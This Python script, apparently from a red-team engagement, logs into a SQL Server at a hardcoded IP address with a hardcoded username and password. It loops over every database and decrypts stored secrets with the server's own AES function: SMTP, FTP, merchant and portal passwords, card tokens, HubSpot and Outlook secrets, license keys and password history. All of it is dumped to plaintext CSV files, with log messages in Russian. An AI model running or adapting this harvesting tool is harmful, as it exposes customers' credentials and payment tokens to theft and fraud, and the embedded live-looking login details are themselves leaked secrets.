#!/usr/bin/env python3
import subprocess
import csv
import time
from pathlib import Path

SERVER = "50.21.183.111"
USER = "irely"
PASS = "iRely486"
OUTPUT_DIR = Path('/root/ir-assessment/redteam/irelydata/decrypted_remaining_fields')
OUTPUT_DIR.mkdir(exist_ok=True)

LOG_FILE = OUTPUT_DIR / 'decryption_log.txt'
SUMMARY_FILE = OUTPUT_DIR / 'decryption_summary.csv'

ENCRYPTED_FIELDS = [
    ('tblSMCompanyPreference', 'intCompanyPreferenceId', [
        ('strSMTPPassword', 'decrypted_smtp_password'),
        ('strMerchantPassword', 'decrypted_merchant_password'),
        ('strQuotingSystemBatchUserPassword', 'decrypted_quoting_password'),
    ]),
    ('tblTMPreferenceCompany', 'intTMPreferenceCompanyId', [
        ('strP3Password', 'decrypted_p3_password'),
        ('strP3GUID', 'decrypted_p3_guid'),
    ]),
    ('tblEMEntitySMTPInformation', 'intEntitySMTPInfoId', [
        ('strPassword', 'decrypted_smtp_password'),
    ]),
    ('tblAPVendor', 'intEntityId', [
        ('strStoreFTPPassword', 'decrypted_ftp_password'),
    ]),
    ('tblARCompanyPreference', 'intCompanyPreferenceId', [
        ('strCreditOverridePassword', 'decrypted_credit_override'),
        ('strMerchantPassword', 'decrypted_merchant_password'),
    ]),
    ('tblARSalesperson', 'intEntityId', [
        ('strPassword', 'decrypted_password'),
    ]),
    ('tblFRConnection', 'intFRConnectionId', [
        ('strPassword', 'decrypted_fr_password'),
    ]),
    ('tblGRUserPreference', 'intUserPreferenceId', [
        ('strProviderPassword', 'decrypted_provider_password'),
    ]),
    ('tblApiUserAccount', 'intUserAccountId', [
        ('strPasswordHash', 'decrypted_password_hash'),
    ]),
    ('tblApiSchemaEMEntity', 'intEntityId', [
        ('strPortalPassword', 'decrypted_portal_password'),
    ]),
    ('tblApiSchemaEmployee', 'intEmployeeId', [
        ('strTimeEntryPassword', 'decrypted_time_entry_password'),
    ]),
    ('tblCRMBrand', 'intBrandId', [
        ('strPassword', 'decrypted_brand_password'),
    ]),
    ('tblCFNetwork', 'intNetworkId', [
        ('strPassword', 'decrypted_network_password'),
    ]),
    ('tblETCompanyPreference', 'intCompanyPreferenceId', [
        ('strFTPPassword', 'decrypted_ftp_password'),
    ]),
    ('tblEMEntityCardInformation', 'intEntityCardInfoId', [
        ('strToken', 'decrypted_card_token'),
    ]),
    ('tblCTNotification', 'intNotificationId', [
        ('strToken', 'decrypted_notification_token'),
    ]),
    ('tblCRMCompanyConfig', 'intCompanyConfigId', [
        ('strHubspotAPIToken', 'decrypted_hubspot_token'),
        ('strOutlookClientSecret', 'decrypted_outlook_secret'),
    ]),
    ('tblCRMHubspotConfig', 'intHubspotConfigId', [
        ('strHsClientSecret', 'decrypted_hs_client_secret'),
        ('strHsRefreshToken', 'decrypted_hs_refresh_token'),
    ]),
    ('tblARCustomerLicenseInformation', 'intCustomerLicenseInformationId', [
        ('strLicenseKey', 'decrypted_license_key'),
    ]),
    ('tblEMEntityPasswordHistory', 'intEntityPasswordHistoryId', [
        ('strPassword', 'decrypted_history_password'),
    ]),
]

def sqlcmd(db, query, timeout=60):
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-d", db, "-Q", query, "-s", "|", "-W"
    ]
    try:
        result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
        return result.stdout, result.stderr
    except subprocess.TimeoutExpired:
        return "", "TIMEOUT"

def get_databases():
    cmd = [
        "docker", "run", "--rm", "--network", "host",
        "mcr.microsoft.com/mssql/server:2022-latest",
        "/opt/mssql-tools18/bin/sqlcmd",
        "-S", SERVER, "-U", USER, "-P", PASS, "-C",
        "-Q", "SET NOCOUNT ON; SELECT name FROM sys.databases WHERE name NOT IN ('master','model','msdb','tempdb') ORDER BY name",
        "-s", "|", "-W", "-h", "-1"
    ]
    result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
    lines = [l.strip() for l in result.stdout.strip().splitlines() if l.strip()]
    skip = ('To learn', 'SQL Server', 'This container', 'user', 'visit', 'running', 'as', 'more', 'is', 'mssql', 'container')
    dbs = [l for l in lines if not any(l.startswith(p) for p in skip) and l not in ('i21Hangfire',) and '\\' not in l]
    return dbs

def table_exists(db, table):
    stdout, _ = sqlcmd(db, f"SET NOCOUNT ON; SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='{table}'", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip()) > 0
    return False

def column_exists(db, table, column):
    stdout, _ = sqlcmd(db, f"SET NOCOUNT ON; SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='{table}' AND COLUMN_NAME='{column}'", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip()) > 0
    return False

def count_encrypted(db, table, field):
    if not column_exists(db, table, field):
        return 0
    stdout, _ = sqlcmd(db, f"SET NOCOUNT ON; SELECT COUNT(*) FROM {table} WHERE {field} IS NOT NULL AND {field} != '' AND LEN({field}) > 40", timeout=15)
    for line in stdout.strip().splitlines():
        if line.strip().isdigit():
            return int(line.strip())
    return 0

def decrypt_table(db, table, pk_field, encrypted_fields):
    select_parts = [pk_field]
    context = {
        'tblSMCompanyPreference': ['strCompanyName'],
        'tblTMPreferenceCompany': ['strCompanyName'],
        'tblEMEntitySMTPInformation': ['strSMTPServer'],
        'tblAPVendor': ['strName'],
        'tblARCompanyPreference': ['strCompanyName'],
        'tblARSalesperson': ['strName'],
        'tblFRConnection': ['strName'],
        'tblGRUserPreference': ['strUserName'],
        'tblApiUserAccount': ['strUserName'],
        'tblApiSchemaEMEntity': ['strName'],
        'tblApiSchemaEmployee': ['strFirstName', 'strLastName'],
        'tblCRMBrand': ['strName'],
        'tblCFNetwork': ['strName'],
        'tblETCompanyPreference': ['strCompanyName'],
        'tblEMEntityCardInformation': ['strNameOnCard'],
        'tblCTNotification': ['strName'],
        'tblCRMCompanyConfig': ['strCompanyName'],
        'tblCRMHubspotConfig': ['strCompanyName'],
        'tblARCustomerLicenseInformation': ['strName'],
        'tblEMEntityPasswordHistory': ['intEntityCredentialId'],
    }
    if table in context:
        select_parts.extend(context[table])
    decrypt_selects = [f"dbo.fnAESDecryptASym({field}) AS {alias}" for field, alias in encrypted_fields]
    query = f"SET NOCOUNT ON; SELECT {', '.join(select_parts + decrypt_selects)} FROM {table}"
    where = [f"({field} IS NOT NULL AND {field} != '' AND LEN({field}) > 40)" for field, _ in encrypted_fields if column_exists(db, table, field)]
    if not where:
        return "", "NO_ENCRYPTED_FIELDS"
    query += f" WHERE {' OR '.join(where)}"
    stdout, stderr = sqlcmd(db, query, timeout=300)
    if 'Invalid object' in stderr or 'Invalid column' in stderr:
        return None, stderr
    return stdout, stderr

def parse_csv_output(text):
    lines = text.strip().splitlines()
    header_idx = None
    for i, line in enumerate(lines):
        if '|' in line and not line.startswith('---') and 'SQL Server' not in line and 'container' not in line and 'go.microsoft' not in line:
            header_idx = i
            break
    if header_idx is None:
        return []
    headers = [h.strip() for h in lines[header_idx].split('|')]
    rows = []
    for line in lines[header_idx + 1:]:
        if not line.strip() or line.startswith('---') or '|' not in line:
            continue
        parts = [p.strip() for p in line.split('|')]
        if len(parts) >= 2:
            while len(parts) < len(headers):
                parts.append('')
            rows.append(dict(zip(headers, parts)))
    return rows

def main():
    log_lines = []
    summary_rows = []
    log_lines.append(f"=== Расшифровка ВСЕХ пропущенных зашифрованных полей ===")
    log_lines.append(f"Время старта: {time.strftime('%Y-%m-%d %H:%M:%S')}")
    log_lines.append("")
    log_lines.append(f"Баз данных: {len(get_databases())}")
    total_records = 0
    total_tables = 0
    total_fields = 0
    
    for db_idx, db in enumerate(get_databases(), 1):
        log_lines.append(f"\n{'='*60}")
        log_lines.append(f"[{db_idx}/{len(get_databases())}] {db}")
        log_lines.append(f"{'='*60}")
        db_tables = 0
        db_fields = 0
        
        for table, pk_field, encrypted_fields in ENCRYPTED_FIELDS:
            if not table_exists(db, table):
                log_lines.append(f"  {table}: таблица не существует")
                continue
            existing = [(f, a) for f, a in encrypted_fields if column_exists(db, table, f)]
            if not existing:
                log_lines.append(f"  {table}: нет зашифрованных полей")
                continue
            count = count_encrypted(db, table, existing[0][0])
            if count == 0:
                log_lines.append(f"  {table}: 0 зашифрованных записей")
                continue
            log_lines.append(f"  {table}: {count} записей, {len(existing)} полей")
            stdout, stderr = decrypt_table(db, table, pk_field, existing)
            if stdout is None:
                log_lines.append(f"    ERROR: {stderr[:200]}")
                continue
            rows = parse_csv_output(stdout)
            if not rows:
                log_lines.append(f"    0 записей расшифровано")
                continue
            safe_db = db.replace('\\', '_')
            csv_file = OUTPUT_DIR / f"{safe_db}_{table}_decrypted.csv"
            with open(csv_file, 'w', newline='', encoding='utf-8') as f:
                writer = csv.DictWriter(f, fieldnames=list(rows[0].keys()))
                writer.writeheader()
                writer.writerows(rows)
            log_lines.append(f"    ✓ {len(rows)} записей -> {csv_file.name}")
            total_records += len(rows)
            total_tables += 1
            total_fields += len(existing)
            db_tables += 1
            db_fields += len(existing)
            summary_rows.append({'database': db, 'table': table, 'fields_count': len(existing), 'encrypted_count': count, 'decrypted_count': len(rows), 'file': csv_file.name})
        log_lines.append(f"  Итого: {db_tables} таблиц, {db_fields} полей")
    
    with open(LOG_FILE, 'w') as f:
        f.write('\n'.join(log_lines))
    if summary_rows:
        with open(SUMMARY_FILE, 'w', newline='', encoding='utf-8') as f:
            writer = csv.DictWriter(f, fieldnames=['database', 'table', 'fields_count', 'encrypted_count', 'decrypted_count', 'file'])
            writer.writeheader()
            writer.writerows(summary_rows)
    
    print('\n'.join(log_lines[-50:]))
    print(f"\n{'='*60}")
    print(f"ИТОГО: {total_records} записей из {total_tables} таблиц, {total_fields} полей")
    print(f"Лог: {LOG_FILE}")
    print(f"Сводка: {SUMMARY_FILE}")
    print(f"Результаты: {OUTPUT_DIR}")

if __name__ == '__main__':
    main()
